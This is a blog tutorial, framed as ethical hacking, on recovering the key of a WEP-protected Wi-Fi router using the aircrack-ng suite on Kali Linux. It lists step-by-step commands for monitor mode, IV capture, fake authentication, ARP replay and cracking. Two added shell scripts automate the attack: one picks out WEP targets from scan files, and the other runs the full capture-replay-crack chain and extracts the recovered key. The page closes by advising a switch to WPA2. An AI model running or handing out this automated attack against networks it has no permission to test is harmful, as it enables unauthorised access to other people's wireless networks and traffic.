Tutorial: Pentest of Wi-Fi routers that use WEP encryption (Ethical Hacking)

Hello everyone,

Today I want to show you how to recover the password of a Wi-Fi access point that is configured with WEP encryption.

For this tutorial I'm using Kali Linux.

To install and configure Kali Linux in VirtualBox you can follow our earlier tip.


Remember that if you are using VirtualBox you will need a USB Wi-Fi adapter, and you must attach it to the VM through the "Devices / USB Devices" menu so that the guest can see it. If you are running Kali directly on the hardware it will detect the wireless card built into your PC or notebook by itself. In either case the card's chipset must support monitor mode and packet injection, otherwise the aireplay-ng steps later on will not work.

In a terminal, type ifconfig (or iwconfig, which lists only the wireless interfaces) to find the name of your wireless card, wlan0 in our case, then run:

# airmon-ng start wlan0

This puts the card into monitor mode and creates a new interface for it, mon0 in this case (newer versions of airmon-ng name it wlan0mon instead; use whichever name airmon-ng reports in the commands that follow). After that, run:

# airodump-ng mon0

You will see a screen similar to this:

[Screenshot: airodump-ng listing of the networks in range]


In the screenshot above you can see all the networks in range. Pick the one whose ENC column shows WEP and take note of three values: its BSSID, its channel (the CH column) and its ESSID, which is the name of the network.
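Reading those three values off the screen works for one network, but airodump-ng also writes a CSV summary of everything it saw when it is started with -w (for example airodump-ng -w scan mon0 produces scan-01.csv). The script below is an added example, not code from the original post: it reads such a file, keeps only the WEP networks and prints exactly the BSSID, channel and ESSID needed for the next command. The sample CSV embedded in it is constructed in airodump-ng's layout; the addresses and network names are made up.

```shell
#!/usr/bin/env bash
# Added example, not part of the original post. Filters an airodump-ng CSV
# (written with -w <prefix>) down to the WEP networks and prints the three
# values the next step needs: BSSID, channel (CH) and ESSID.

# Constructed sample in airodump-ng's CSV layout: two APs (one WEP, one WPA2)
# followed by the station section, which starts with "Station MAC".
SAMPLE_CSV='
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:00:00:00:00:01, 2014-04-24 10:18:01, 2014-04-24 10:20:30,  6,  54, WEP , WEP, OPN, -40,      120,     3000,   0.  0.  0.  0,  12, dlink-test-a,
00:00:00:00:00:03, 2014-04-24 10:18:02, 2014-04-24 10:20:30, 11,  54, WPA2, CCMP, PSK, -65,       80,        0,   0.  0.  0.  0,   8, homewifi,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:00:00:00:00:02, 2014-04-24 10:19:00, 2014-04-24 10:20:30, -50,  15, 00:00:00:00:00:01,
'

# Read an airodump-ng CSV on stdin; print "BSSID CH ESSID" for every WEP AP.
# Column positions in the AP section: 1=BSSID 4=channel 6=Privacy 14=ESSID.
# Simplifying assumption: an ESSID containing a comma would spill past
# field 14 and is not handled here.
list_wep_targets() {
    awk -F',' '
        /^Station MAC/ { exit }          # station section begins: done with APs
        /^BSSID, First/ { next }         # header row
        NF < 14 { next }                 # blank or malformed line
        {
            for (i = 1; i <= NF; i++) gsub(/^[ \t]+|[ \t]+$/, "", $i)
            if ($6 ~ /WEP/) print $1, $4, $14
        }'
}

# Same, for a CSV held in a shell variable (used with the sample above).
list_wep_targets_in() {
    printf '%s\n' "$1" | list_wep_targets
}

# Number of WEP APs in the scan, useful as a quick audit figure.
count_wep_targets_in() {
    list_wep_targets_in "$1" | awk 'END { print NR }'
}

list_wep_targets_in "$SAMPLE_CSV"    # prints: 00:00:00:00:00:01 6 dlink-test-a
```

For a real scan, pipe the file in with `list_wep_targets < scan-01.csv`. Run without the --bssid filter for a few minutes first so that every AP in range ends up in the file; the same loop is a quick way to audit a site for WEP networks that should be retired.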

With that information in hand, run the next command:

# airodump-ng --ivs -w wep --channel 6 --bssid 00:00:00:00:00:01 mon0

Replace wep with any name you like; it is only the prefix of the capture files that will be created, e.g. wep-01.ivs, wep-02.ivs and so on.

Replace the value of --channel with the channel number shown in the CH column of the first scan.

Replace the value of --bssid with the BSSID shown in the BSSID column of the first scan.

If everything is correct you will see a screen similar to the one below:

[Screenshot: airodump-ng capturing IVs from the target network]


The next step is to generate traffic so that enough IVs are captured to break the key. Leave the airodump-ng capture above running and, in a second terminal, fake an association with the AP and then replay its ARP requests with the following two commands:

# aireplay-ng -1 0 -e dlink-test-a -a 00:00:00:00:00:01 -h 00:00:00:00:00:02 mon0
# aireplay-ng -3 -b 00:00:00:00:00:01 -h 00:00:00:00:00:02 mon0

In the first command, replace the value of -e with the ESSID from the first scan, the value of -a with the BSSID of the access point, and the value of -h with your own MAC address (the one ifconfig shows for the wireless card).

In the second command, replace the value of -b with the same BSSID and the value of -h with your MAC address again.

Leave the second aireplay-ng running long enough to collect enough data to break the key. The #Data column in the airodump-ng window is the number of captured IVs; a few tens of thousands are usually enough for a 64-bit key, and somewhat more for a 128-bit key.

It will look roughly like this:

[Screenshot: aireplay-ng ARP request replay running]


Now comes the best part: recovering the Wi-Fi key. After waiting a while (about 5 minutes in my case), just run:

# aircrack-ng -a 1 wep-01.ivs

Where, of course, you replace wep-01.ivs with the name of the .ivs file generated on your machine (you can also pass wep-*.ivs to use all of them). The key is then displayed like this:

[Screenshot: aircrack-ng output with the KEY FOUND! line]

In the case above the key is 12345.
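The four steps above wrapped in one script, as an added example rather than code from the original post. It assumes airmon-ng has already been run and takes the monitor interface name as an argument; it validates the BSSID, MAC and channel before touching the card, runs the capture and the ARP replay in the background, lets aircrack-ng retry on the growing .ivs file, and parses the KEY FOUND! line instead of leaving you to read it off the screen. The script name wep.sh, the sample aircrack-ng output and all addresses are made up for illustration.

```shell
#!/usr/bin/env bash
# Added example, not part of the original post: the four tutorial steps in one
# script with input validation and parsing of the aircrack-ng result. Assumes
# airmon-ng was already run and the monitor interface (mon0 / wlan0mon) is
# passed in. Nothing touches the card unless invoked as:
#   ./wep.sh run  <BSSID> <CH> <ESSID> <own MAC> <monitor iface> [prefix]
#   ./wep.sh show <BSSID> <CH> <ESSID> <own MAC> <monitor iface> <prefix>

# True if $1 is a MAC/BSSID: six colon-separated hex pairs.
valid_mac() {
    printf '%s\n' "$1" | grep -Eq '^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$'
}

# True if $1 is a 2.4 GHz channel number (1-14), where WEP equipment lives.
valid_channel() {
    case "$1" in
        [1-9]|1[0-4]) return 0 ;;
        *)            return 1 ;;
    esac
}

# Print the command for each step. Args: bssid channel essid own_mac iface prefix
wep_commands() {
    valid_mac "$1" && valid_mac "$4" && valid_channel "$2" || return 1
    # 1. capture only IVs from the target, locked to its channel -> <prefix>-01.ivs
    printf 'airodump-ng --ivs -w %s --channel %s --bssid %s %s\n' "$6" "$2" "$1" "$5"
    # 2. fake authentication (-1 0: authenticate once) so the AP accepts our frames
    printf 'aireplay-ng -1 0 -e "%s" -a %s -h %s %s\n' "$3" "$1" "$4" "$5"
    # 3. ARP request replay: every replayed packet makes the AP emit a fresh IV
    printf 'aireplay-ng -3 -b %s -h %s %s\n' "$1" "$4" "$5"
    # 4. crack (-a 1 = WEP); -b avoids the interactive network prompt
    printf 'aircrack-ng -a 1 -b %s %s-*.ivs\n' "$1" "$6"
}

# Pull the key out of aircrack-ng output such as
#   KEY FOUND! [ 31:32:33:34:35 ] (ASCII: 12345 )
# Prints "<hex> <ascii>" (ASCII omitted when aircrack-ng gives none); fails if absent.
parse_wep_key() {
    line=$(printf '%s\n' "$1" | grep 'KEY FOUND!') || return 1
    hex=$(printf '%s\n' "$line" | sed 's/.*KEY FOUND! \[ *\([0-9A-Fa-f:]*\).*/\1/')
    ascii=$(printf '%s\n' "$line" | sed -n 's/.*(ASCII: *\([^)]*\)).*/\1/p')
    printf '%s %s\n' "$hex" "$ascii" | sed 's/ *$//'
}

# Decode a colon-separated hex key to ASCII, to double-check aircrack-ng's reading.
wep_hex_to_ascii() {
    ( IFS=:; for b in $1; do printf "\\$(printf '%03o' "$((0x$b))")"; done; echo )
}

# Constructed sample of the tail of aircrack-ng's output: the KEY FOUND! line is
# in the tool's real format, the surrounding numbers are made up.
SAMPLE_AIRCRACK='
                 [00:00:03] Tested 1514 keys (got 30566 IVs)

   KB    depth   byte(vote)
    0    0/  1   31(38400) 7A(36864) 9E(36608)

             KEY FOUND! [ 31:32:33:34:35 ] (ASCII: 12345 )
	Decrypted correctly: 100%
'

# Run the whole attack. Args: bssid channel essid own_mac iface [prefix]
run_wep_attack() {
    prefix=${6:-wep}
    wep_commands "$1" "$2" "$3" "$4" "$5" "$prefix" >/dev/null || return 1
    airodump-ng --ivs -w "$prefix" --channel "$2" --bssid "$1" "$5" >/dev/null 2>&1 &
    dump_pid=$!
    sleep 5                                    # let airodump-ng create the .ivs file
    aireplay-ng -1 0 -e "$3" -a "$1" -h "$4" "$5" || { kill "$dump_pid"; return 1; }
    aireplay-ng -3 -b "$1" -h "$4" "$5" >/dev/null 2>&1 &
    replay_pid=$!
    trap 'kill $dump_pid $replay_pid 2>/dev/null' EXIT INT TERM
    # aircrack-ng keeps re-reading the growing .ivs file and retries by itself
    aircrack-ng -a 1 -b "$1" "$prefix"-*.ivs | tee "$prefix.aircrack.log"
    parse_wep_key "$(cat "$prefix.aircrack.log")"
}

case "${1:-}" in
    run)  shift; run_wep_attack "$@" ;;
    show) shift; wep_commands "$@" ;;
esac
```

The fake-authentication step is the one that most often fails in practice (the AP does not answer, or the card cannot inject), which is why the script stops there instead of replaying into the void; when that happens, check that the own MAC matches the card and that the adapter supports injection before retrying.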

There is only one way to protect yourself against this: never, ever use WEP! Switch the router to WPA2 with a strong passphrase.

How to find the password of any Wi-Fi router that has WPS enabled, regardless of the type of encryption used


How to find the password of a Wi-Fi router with WPA2 encryption enabled: see this tip here


I hope you enjoyed it.

Don't forget to share and subscribe to our blog.

Hugs, and until next time.